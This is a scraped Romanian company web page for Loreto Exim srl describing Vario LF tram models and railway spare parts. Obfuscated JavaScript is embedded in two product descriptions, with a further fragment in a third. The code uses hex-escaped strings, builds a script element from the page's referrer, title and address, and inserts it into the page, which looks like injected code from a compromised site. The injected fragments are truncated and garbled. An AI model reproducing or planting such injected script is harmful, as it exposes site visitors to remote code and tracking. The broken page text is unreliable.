Tramvai Vario LF3

GENERALITATI Vehiculul este construit din trei sectiuni, unidirectional cu opt osii, podea joasa si motor. Este destinat transportului urban si pe linii de sosea. Vagonul este actionat de patru boghiuri. Sectiunile sunt articulate si burduful este montat deasupra boghiurilor. Inaltimea podelei vagonului este sectionala respectiv 860 / 350 mm. Modulele individuale dintre boghiuri au podea […]

Tramvai Vario LF

GENERALITATI Este un vehicul unidirectional pe patru osii cu motor si podea joasa. Vagonul de tramvai serveste pentru transportul public urban. Operarea se poate realiza prin unul sau doua vagoane motoare sau prin unul sau doua vagoane motoare plus vagon remorca cuplate intr-un tren de vagoane. CONDUCERE Vehiculul are doua boghiuri tractoare cu suspensie primara […]

Amortizoare de zgomot

1. Inele amortizoare de zgomot 2. Amortizoare complexe \x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Piese de schimb destinate vagoanelor pentru transport marfa

1.Roti speciale optimizate pentru rezistenta la efort 2. Alte piese de schimb t;,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Piese de schimb destinate vehiculelor pentru transport urban

1. Roti elastice 2. Piese de schimb pentru garnituri de metrou 3. Alte piese de schimb

Piese de Schimb pentru Locomotive

1. Osii cu roti montate 2. Osii si roti 1f1[12])=== -1){alert(_0x31f1[23])}

Tramvai Vario LF2

GENERALITATI Vario LF2 este destinat transportului urban si pe linii de sosea. Este compus din doua sectiuni actionate de trei boghiuri. Sectiunile sunt articulate si burduful este montat deasupra boghiului central. Inaltimea podelei vagonului este sectionala respectiv 860 / 350 mm. Sectiunile individuale dintre boghiuri au podea joasa de 350 mm de la suprafata sinei. […]

Piese de Schimb pentru Material Rulant destinat Transportului de Persoane

1. Osii motoare cu roti 2. Osii standard cu roti 3. Osii si roti

© 2011 Loreto Exim srl Suffusion theme by Sayontan Sinha